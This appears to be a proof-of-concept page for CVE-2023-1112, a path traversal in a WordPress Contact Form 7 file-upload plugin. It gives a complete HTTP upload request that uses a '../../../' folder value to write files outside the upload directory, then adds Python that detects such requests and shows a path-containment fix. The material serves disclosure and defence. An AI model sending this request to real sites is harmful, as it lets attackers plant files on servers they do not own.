
CVE-2023-1112 PoC — Drag and Drop Multiple File Upload Contact Form 7 admin-ajax.php path traversal

Source
Associated Vulnerability
Title: Drag and Drop Multiple File Upload Contact Form 7 admin-ajax.php path traversal (CVE-2023-1112)
Description: A vulnerability was found in Drag and Drop Multiple File Upload Contact Form 7 5.0.6.1 on WordPress. It has been classified as critical. Affected is an unknown function of the file admin-ajax.php. The manipulation of the argument upload_name leads to relative path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222072.
Description
Drag and Drop Multiple File Uploader PRO - Contact Form 7 v5.0.6.1 Path Traversal (CVE-2023-1112)
Readme
# CVE-2023-1112 - Drag and Drop Multiple File Uploader PRO - Contact Form 7 v5.0.6.1 Path Traversal

# Info
Path Traversal in Drag and Drop Multiple File Uploader PRO - Contact Form 7 version 5.0.6.1 allows an unauthenticated remote attacker to upload files to any writable location on the remote server (CVE-2023-1112).

To exploit this vulnerability, the attacker uploads a file through the plugin's form. The POST request must contain the parameter `upload_name`, whose value is the name of the folder the file will be written to. The attacker can supply any value, such as `../`, `../../../`, or `foldername` (which creates the folder "foldername" inside the upload directory), because the value is used without being sanitized.

# Example

```
POST /wp-admin/admin-ajax.php HTTP/2
Host: example.org
Content-Length: 756
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIzvIrbHjHpxzepPi
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="size_limit"

2e+9
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="action"

dnd_codedropz_upload
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload_dir"

../../../
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="post_id"

1868
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="security"

0a4dca2b89
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="form_id"

9210
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload_name"

foto
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload-file"; filename="pngout.png"
Content-Type: image/png

// image contents
------WebKitFormBoundaryIzvIrbHjHpxzepPi--

```
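The following is an added example, not code from this PoC or from the plugin: it parses a multipart body like the request above, picks out the `dnd_codedropz_upload` action and its folder-name fields (`upload_dir` and `upload_name`, the names used in the PoC), and applies the containment check a fixed handler should run before joining a client-supplied folder name onto the upload root. The upload root path and the trimmed request body are constructed for the example.

```python
"""Detect and block path traversal in Drag and Drop Multiple File Upload
(Contact Form 7) admin-ajax.php upload requests (CVE-2023-1112).

Added example for this page; not the plugin's code. Field names are taken
from the PoC request; the upload root and sample body are constructed.
"""
import posixpath
import re
from typing import Dict, List, Optional

# Assumed upload root for the example (not taken from the plugin).
UPLOAD_ROOT = "/var/www/html/wp-content/uploads"

# Constructed sample: the PoC request body, trimmed to the relevant parts.
BOUNDARY = "----WebKitFormBoundaryIzvIrbHjHpxzepPi"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="action"\r\n\r\n'
    "dnd_codedropz_upload\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="upload_dir"\r\n\r\n'
    "../../../\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="upload_name"\r\n\r\n'
    "foto\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="upload-file"; filename="pngout.png"\r\n'
    "Content-Type: image/png\r\n\r\n"
    "\x89PNG... (constructed placeholder for image bytes)\r\n"
    f"--{BOUNDARY}--\r\n"
)


def parse_multipart(body: str, boundary: str) -> Dict[str, str]:
    """Return {field name: value} for the non-file parts of a multipart body.

    File parts (those with a filename= attribute) are skipped; only the
    plain form fields are needed to judge the folder name.
    """
    fields: Dict[str, str] = {}
    for part in body.split(f"--{boundary}"):
        part = part.strip("\r\n")
        if not part or part == "--":          # leading empty part / closing "--"
            continue
        headers, _, value = part.partition("\r\n\r\n")
        match = re.search(r'name="([^"]+)"', headers)
        if not match or 'filename="' in headers:
            continue
        fields[match.group(1)] = value
    return fields


def resolve_under_root(root: str, name: str) -> Optional[str]:
    """Join a client-supplied folder name onto root and return the resolved
    path only if it stays inside root. None means the request must be
    rejected: '..' components, absolute paths and NUL bytes all fail here.
    """
    if "\x00" in name:
        return None
    root = posixpath.normpath(root)
    # posixpath.join discards root if name is absolute, so an absolute
    # name also fails the prefix test below.
    target = posixpath.normpath(posixpath.join(root, name))
    if target == root or target.startswith(root + "/"):
        return target
    return None


def flag_request(body: str, boundary: str, root: str = UPLOAD_ROOT) -> List[str]:
    """Return one finding per folder-name field that would escape the upload
    root in a dnd_codedropz_upload request; an empty list means the request
    is clean (or is not an upload request at all).
    """
    fields = parse_multipart(body, boundary)
    findings: List[str] = []
    if fields.get("action") != "dnd_codedropz_upload":
        return findings
    for key in ("upload_dir", "upload_name"):
        value = fields.get(key, "")
        if resolve_under_root(root, value) is None:
            findings.append(f"{key}={value!r} escapes upload root")
    return findings


if __name__ == "__main__":
    for finding in flag_request(SAMPLE_BODY, BOUNDARY):
        print("BLOCK:", finding)
```

The same `resolve_under_root` check is what the upload handler should apply server-side: normalise the joined path and refuse anything that does not remain under the uploads directory, rather than trying to strip `../` sequences from the input string.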
# Screenshots

### Normal request
![image](https://user-images.githubusercontent.com/3837916/216743824-2a11a7e6-d954-4a1d-ac98-7ddc0d996dcd.png)

### Malicious request
![image](https://user-images.githubusercontent.com/3837916/216743964-378a88d4-ed53-481b-a748-8c09c9868070.png)

### Malicious request successfully uploaded the file to the webserver root
![image](https://user-images.githubusercontent.com/3837916/216744024-50997229-58d5-4e76-9e74-aa4c9fc27a00.png)